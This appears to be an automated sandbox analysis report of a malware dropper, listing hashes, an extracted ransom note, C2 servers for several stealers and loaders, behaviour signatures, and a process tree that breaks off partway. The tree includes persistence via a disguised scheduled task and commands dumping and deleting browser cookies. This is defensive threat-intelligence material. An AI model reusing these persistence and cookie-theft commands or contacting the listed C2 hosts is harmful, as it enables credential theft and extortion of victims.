Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    745s
  • max time network
    1812s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    03-08-2021 09:42

General

  • Target

    8 (16).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Path

C:\_readme.txt

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-CnI3tI6Ktv Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@mailtemp.ch Reserve e-mail address to contact us: managerhelper@airmail.cc Your personal ID: 0323gDrgoSgcyhrmIFKlwG8I3XxekHbYahiFXX0aowKJPQVTk
Emails

manager@mailtemp.ch

managerhelper@airmail.cc

URLs

https://we.tl/t-CnI3tI6Ktv

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

2_8_r

C2

zertypelil.xyz:80

Extracted

Family

redline

Botnet

WW

C2

193.56.146.60:51431

Extracted

Family

vidar

Version

39.9

Botnet

937

C2

https://prophefliloc.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • Registers COM server for autorun 1 TTPs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Nirsoft 1 IoCs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 6 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 7 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Sets service image path in registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 14 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 18 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 17 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 8 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 12 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 14 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 5 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 8 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 55 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 9 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
      PID:2692
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2672
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2596
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2380
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2364
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1852
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1416
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                  • Modifies registry class
                  PID:1396
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1204
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1164
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1040
                      • C:\Users\Admin\AppData\Roaming\dvbrriv
                        C:\Users\Admin\AppData\Roaming\dvbrriv
                        2⤵
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:4152
                      • C:\Users\Admin\AppData\Roaming\wvbrriv
                        C:\Users\Admin\AppData\Roaming\wvbrriv
                        2⤵
                        • Suspicious use of SetThreadContext
                        PID:5888
                        • C:\Users\Admin\AppData\Roaming\wvbrriv
                          C:\Users\Admin\AppData\Roaming\wvbrriv
                          3⤵
                            PID:3972
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:4356
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            3⤵
                              PID:5540
                              • C:\Windows\SysWOW64\schtasks.exe
                                /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                4⤵
                                • Creates scheduled task(s)
                                PID:4584
                          • C:\Users\Admin\AppData\Local\68db22bc-d87f-4513-9116-ae70666a9697\BE2E.exe
                            C:\Users\Admin\AppData\Local\68db22bc-d87f-4513-9116-ae70666a9697\BE2E.exe --Task
                            2⤵
                            • Suspicious use of SetThreadContext
                            PID:4376
                            • C:\Users\Admin\AppData\Local\68db22bc-d87f-4513-9116-ae70666a9697\BE2E.exe
                              C:\Users\Admin\AppData\Local\68db22bc-d87f-4513-9116-ae70666a9697\BE2E.exe --Task
                              3⤵
                                PID:5032
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              2⤵
                              • Suspicious use of SetThreadContext
                              PID:4532
                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                3⤵
                                  PID:200
                              • \??\c:\windows\system\svchost.exe
                                c:\windows\system\svchost.exe
                                2⤵
                                  PID:4316
                                • C:\Users\Admin\AppData\Local\68db22bc-d87f-4513-9116-ae70666a9697\BE2E.exe
                                  C:\Users\Admin\AppData\Local\68db22bc-d87f-4513-9116-ae70666a9697\BE2E.exe --Task
                                  2⤵
                                    PID:2220
                                    • C:\Users\Admin\AppData\Local\68db22bc-d87f-4513-9116-ae70666a9697\BE2E.exe
                                      C:\Users\Admin\AppData\Local\68db22bc-d87f-4513-9116-ae70666a9697\BE2E.exe --Task
                                      3⤵
                                        PID:5420
                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                      2⤵
                                        PID:996
                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                          3⤵
                                            PID:4560
                                        • C:\Users\Admin\AppData\Roaming\dvbrriv
                                          C:\Users\Admin\AppData\Roaming\dvbrriv
                                          2⤵
                                            PID:976
                                          • C:\Users\Admin\AppData\Roaming\wvbrriv
                                            C:\Users\Admin\AppData\Roaming\wvbrriv
                                            2⤵
                                              PID:4600
                                              • C:\Users\Admin\AppData\Roaming\wvbrriv
                                                C:\Users\Admin\AppData\Roaming\wvbrriv
                                                3⤵
                                                  PID:3052
                                              • C:\Users\Admin\AppData\Roaming\rvbrriv
                                                C:\Users\Admin\AppData\Roaming\rvbrriv
                                                2⤵
                                                  PID:5512
                                                • C:\Windows\system32\rundll32.exe
                                                  C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\KGCToQuEL\KGCToQuEL.dll",KGCToQuEL
                                                  2⤵
                                                    PID:5584
                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    2⤵
                                                      PID:1324
                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                        3⤵
                                                          PID:1160
                                                      • C:\Users\Admin\AppData\Local\68db22bc-d87f-4513-9116-ae70666a9697\BE2E.exe
                                                        C:\Users\Admin\AppData\Local\68db22bc-d87f-4513-9116-ae70666a9697\BE2E.exe --Task
                                                        2⤵
                                                          PID:3120
                                                          • C:\Users\Admin\AppData\Local\68db22bc-d87f-4513-9116-ae70666a9697\BE2E.exe
                                                            C:\Users\Admin\AppData\Local\68db22bc-d87f-4513-9116-ae70666a9697\BE2E.exe --Task
                                                            3⤵
                                                              PID:708
                                                          • \??\c:\windows\system\svchost.exe
                                                            c:\windows\system\svchost.exe
                                                            2⤵
                                                              PID:5432
                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              2⤵
                                                                PID:1740
                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  3⤵
                                                                    PID:3160
                                                                • C:\Users\Admin\AppData\Local\68db22bc-d87f-4513-9116-ae70666a9697\BE2E.exe
                                                                  C:\Users\Admin\AppData\Local\68db22bc-d87f-4513-9116-ae70666a9697\BE2E.exe --Task
                                                                  2⤵
                                                                    PID:1096
                                                                    • C:\Users\Admin\AppData\Local\68db22bc-d87f-4513-9116-ae70666a9697\BE2E.exe
                                                                      C:\Users\Admin\AppData\Local\68db22bc-d87f-4513-9116-ae70666a9697\BE2E.exe --Task
                                                                      3⤵
                                                                        PID:4840
                                                                    • C:\Users\Admin\AppData\Roaming\wvbrriv
                                                                      C:\Users\Admin\AppData\Roaming\wvbrriv
                                                                      2⤵
                                                                        PID:4100
                                                                        • C:\Users\Admin\AppData\Roaming\wvbrriv
                                                                          C:\Users\Admin\AppData\Roaming\wvbrriv
                                                                          3⤵
                                                                            PID:5396
                                                                        • C:\Users\Admin\AppData\Roaming\dvbrriv
                                                                          C:\Users\Admin\AppData\Roaming\dvbrriv
                                                                          2⤵
                                                                            PID:5156
                                                                          • C:\Users\Admin\AppData\Roaming\rvbrriv
                                                                            C:\Users\Admin\AppData\Roaming\rvbrriv
                                                                            2⤵
                                                                              PID:2388
                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              2⤵
                                                                                PID:5704
                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  3⤵
                                                                                    PID:4188
                                                                                • \??\c:\windows\system\svchost.exe
                                                                                  c:\windows\system\svchost.exe
                                                                                  2⤵
                                                                                    PID:4328
                                                                                  • C:\Users\Admin\AppData\Local\68db22bc-d87f-4513-9116-ae70666a9697\BE2E.exe
                                                                                    C:\Users\Admin\AppData\Local\68db22bc-d87f-4513-9116-ae70666a9697\BE2E.exe --Task
                                                                                    2⤵
                                                                                      PID:6012
                                                                                      • C:\Users\Admin\AppData\Local\68db22bc-d87f-4513-9116-ae70666a9697\BE2E.exe
                                                                                        C:\Users\Admin\AppData\Local\68db22bc-d87f-4513-9116-ae70666a9697\BE2E.exe --Task
                                                                                        3⤵
                                                                                          PID:5864
                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                        2⤵
                                                                                          PID:32
                                                                                      • c:\windows\system32\svchost.exe
                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                        1⤵
                                                                                          PID:1000
                                                                                        • C:\Users\Admin\AppData\Local\Temp\8 (16).exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\8 (16).exe"
                                                                                          1⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:4092
                                                                                          • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:2708
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\setup_install.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\7zS49A39164\setup_install.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:3940
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                                                                4⤵
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:1324
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\sonia_1.exe
                                                                                                  sonia_1.exe
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:3112
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\sonia_1.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\7zS49A39164\sonia_1.exe" -a
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:3276
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                                                                4⤵
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:2108
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\sonia_4.exe
                                                                                                  sonia_4.exe
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:1340
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                4⤵
                                                                                                  PID:4032
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                  4⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:3144
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\sonia_6.exe
                                                                                                    sonia_6.exe
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Adds Run key to start application
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:1436
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      6⤵
                                                                                                        PID:3856
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:2720
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        6⤵
                                                                                                          PID:3632
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                          6⤵
                                                                                                            PID:1996
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 528
                                                                                                        4⤵
                                                                                                        • Program crash
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4012
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c sonia_5.exe
                                                                                                        4⤵
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:3612
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                                                                        4⤵
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:3716
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                                                                        4⤵
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:3560
                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                  1⤵
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  • Modifies registry class
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:792
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                    2⤵
                                                                                                    • Checks processor information in registry
                                                                                                    • Modifies registry class
                                                                                                    PID:4192
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                    2⤵
                                                                                                    • Drops file in System32 directory
                                                                                                    • Checks processor information in registry
                                                                                                    • Modifies registry class
                                                                                                    PID:1916
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS49A39164\sonia_5.exe
                                                                                                  sonia_5.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks computer location settings
                                                                                                  PID:1388
                                                                                                  • C:\Users\Admin\Documents\04IF7zD_xLV2n_7wGgoFm18M.exe
                                                                                                    "C:\Users\Admin\Documents\04IF7zD_xLV2n_7wGgoFm18M.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5100
                                                                                                    • C:\Users\Admin\Documents\04IF7zD_xLV2n_7wGgoFm18M.exe
                                                                                                      "C:\Users\Admin\Documents\04IF7zD_xLV2n_7wGgoFm18M.exe"
                                                                                                      3⤵
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:2132
                                                                                                  • C:\Users\Admin\Documents\45f6fXEqGg9ZcszhyO12ZBcO.exe
                                                                                                    "C:\Users\Admin\Documents\45f6fXEqGg9ZcszhyO12ZBcO.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5088
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      3⤵
                                                                                                        PID:5064
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5228
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        3⤵
                                                                                                          PID:2508
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                          3⤵
                                                                                                            PID:3340
                                                                                                        • C:\Users\Admin\Documents\YNiQtxVHnfGlBWE_faT4Vck4.exe
                                                                                                          "C:\Users\Admin\Documents\YNiQtxVHnfGlBWE_faT4Vck4.exe"
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5076
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 660
                                                                                                            3⤵
                                                                                                            • Program crash
                                                                                                            PID:4372
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 672
                                                                                                            3⤵
                                                                                                            • Program crash
                                                                                                            PID:4684
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 676
                                                                                                            3⤵
                                                                                                            • Program crash
                                                                                                            PID:1384
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 692
                                                                                                            3⤵
                                                                                                            • Program crash
                                                                                                            PID:4324
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 772
                                                                                                            3⤵
                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                            • Program crash
                                                                                                            PID:4388
                                                                                                        • C:\Users\Admin\Documents\8iMRR4GSrHZsVVTxK393UqQQ.exe
                                                                                                          "C:\Users\Admin\Documents\8iMRR4GSrHZsVVTxK393UqQQ.exe"
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Drops file in Program Files directory
                                                                                                          PID:5060
                                                                                                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                            "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Checks whether UAC is enabled
                                                                                                            • Drops file in Program Files directory
                                                                                                            PID:3928
                                                                                                          • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                            "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                                            3⤵
                                                                                                              PID:4416
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                4⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5348
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                4⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5424
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                4⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5392
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                4⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5472
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
